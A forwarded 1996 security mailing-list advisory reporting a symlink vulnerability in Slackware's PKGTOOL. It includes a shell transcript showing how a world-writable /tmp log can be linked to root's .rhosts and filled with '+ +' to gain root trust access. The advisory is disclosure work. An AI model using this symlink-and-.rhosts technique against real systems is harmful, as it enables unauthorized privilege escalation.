From proff Tue Sep 17 18:19:59 1996 Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id SAA00826 for best-of-security; Tue, 17 Sep 1996 18:19:59 +1000 From: Julian Assange Message-Id: <199609170819.SAA00826@suburbia.net> Subject: [linux-security] [BUG] Vulnerability in PKGTOOL (fwd) To: best-of-security Date: Tue, 17 Sep 1996 18:19:58 +1000 (EST) Approved: proff@suburbia.net X-Mailer: ELM [version 2.4 PL23] Content-Type: text Forwarded message: From best-of-security-request@suburbia.net Tue Sep 17 17:54:15 1996 X-Envelope-From: slogic@lightning.netcore.com.au Tue Sep 17 17:54:13 1996 From: Tech-Manip Message-Id: <199609171926.PAA11297@lightning.netcore.com.au> Subject: [linux-security] [BUG] Vulnerability in PKGTOOL (fwd) To: best-of-security@suburbia.net Date: Tue, 17 Sep 1996 15:26:07 -0400 (EDT) X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Forwarded message: >From owner-linux-security@tarsier.cv.nrao.edu Tue Sep 17 15:15:05 1996 Resent-Date: Mon, 16 Sep 1996 12:29:58 -0400 Resent-From: Jeff Uphoff Resent-Message-Id: <199609161629.MAA08571@tarsier.cv.nrao.edu> Resent-To: linux-security@tarsier.cv.nrao.edu MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Message-ID: X-cc: New Hack City Projects , "(d)(M)(v)" , Raven , Bill Arcand From: "Sean B. Hamor" To: Multiple recipients of list BUGTRAQ Subject: [linux-security] [BUG] Vulnerability in PKGTOOL Date: Mon, 26 Aug 1996 21:22:49 -0400 X-Mailer: VM 5.95 (beta); GNU Emacs 19.29.1 X-Attribution: Up Sender: owner-linux-security@tarsier.cv.nrao.edu Precedence: list [Mod: Forwarded from Bugtraq. --Jeff.] -----BEGIN PGP SIGNED MESSAGE----- Monday, August 26, 1996 The Litterbox Sean B. Hamor PKGTOOL Note: I'm not sure whether or not information this has been previously released. I found this earlier this evening while poking around, and apologize if I've just found an old bug. I verified the existence of this bug in PKGTOOL for Linux Slackware 3.0. My assumption would be that most other Linux distributions are effected as well. Synopsis: A problem exists in the way PKGTOOL handles the /tmp/PKGTOOL.REMOVED logfile. This logfile is created mode 666, which allows any user to write to it. Although this file is usually created the first time PKGTOOL is run and can't be removed by normal users, a problem develops if root or the owner of the logfile deletes it for some reason or if PKGTOOL has never been run before. Exploit: If /tmp/PKGTOOL.REMOVED gets deleted or hasn't been created yet, any user can now create a symbolic link from /tmp/PKGTOOL.REMOVED to ~root/.rhosts (for a generic example). The next time PKGTOOL is run, which will more than likely be run by root, ~root/.rhosts will be created as a 666 file with the logs from PKGTOOL as its contents. One may now simply do an echo "+ +" > /tmp/PKGTOOL.REMOVED, then rm /tmp/PKGTOOL.REMOVED. For this example, root is the victim while hamors is the attacker: hamors (2 20:57) litterbox:/tmp> ls -al | grep PKG - -rw-rw-rw- 1 root root 16584 Aug 26 18:07 PKGTOOL.REMOVED.backup hamors (3 21:00) litterbox:/tmp> ln -s ~root/.rhosts PKGTOOL.REMOVED hamors (4 20:58) litterbox:/tmp> cat PKGTOOL.REMOVED cat: PKGTOOL.REMOVED: No such file or directory God (17 20:59) litterbox:~# pkgtool root now uses PKGTOOL to delete a package hamors (5 DING!) litterbox:/tmp> head PKGTOOL.REMOVED Removing package tcl: Removing files: ... hamors (6 21:00) litterbox:/tmp> echo "+ +" > PKGTOOL.REMOVED hamors (7 21:00) litterbox:/tmp> cat ~root/.rhosts + + Verification: This vulnerability has been tested on Linux Slackware 3.0 with the stock installed PKGTOOL. EOF Finger hamors@ishiboo.com /\_/\ mailto:hamors@litterbox.org for PGP public key block. ( o.o ) http://www.ishiboo.com/~hamors/ alt.litterbox, The Home of TOCA > ^ < http://www.litterbox.org/~hamors/ Hi! I'm a .signature virus! Add me to your .signature and join in the fun! -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMiJN7zU6HlxZIJ+FAQE7NAf9E5P4vobbqztG9U/dlV85EveNOm0y5g8y YP+2IAgOp4kV1CPrNYgVPNLu06xwycrI/fYyF5EZNOvL/UEYYp+OvpRXk23Z7du9 6nQ7rzF7yPoo+mL5nauXTNQArRvYTHktXQejgApKQNr7XdzwRGL64Q/Y0NH+C9P+ AtxehPQk+7dXWMOX2jeFwkX11DQ9urU/SEWvoJEuv2qV4/aaIHBLrEGs4xkxHPzk xtPKJGb05qIoZ6kuibLnfE6rElIYbaDbYmXhX7hnzymPa8gPJv/J0UHuXBg0Qj2o D8+FeJC6ZMJL9V6/ERw4BfcaYwO5TGuVm5+Ui/9g1OZ9xrXppxNt9Q== =Ujhw -----END PGP SIGNATURE----- -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff@suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 | +---------------------+--------------------+----------------------------------+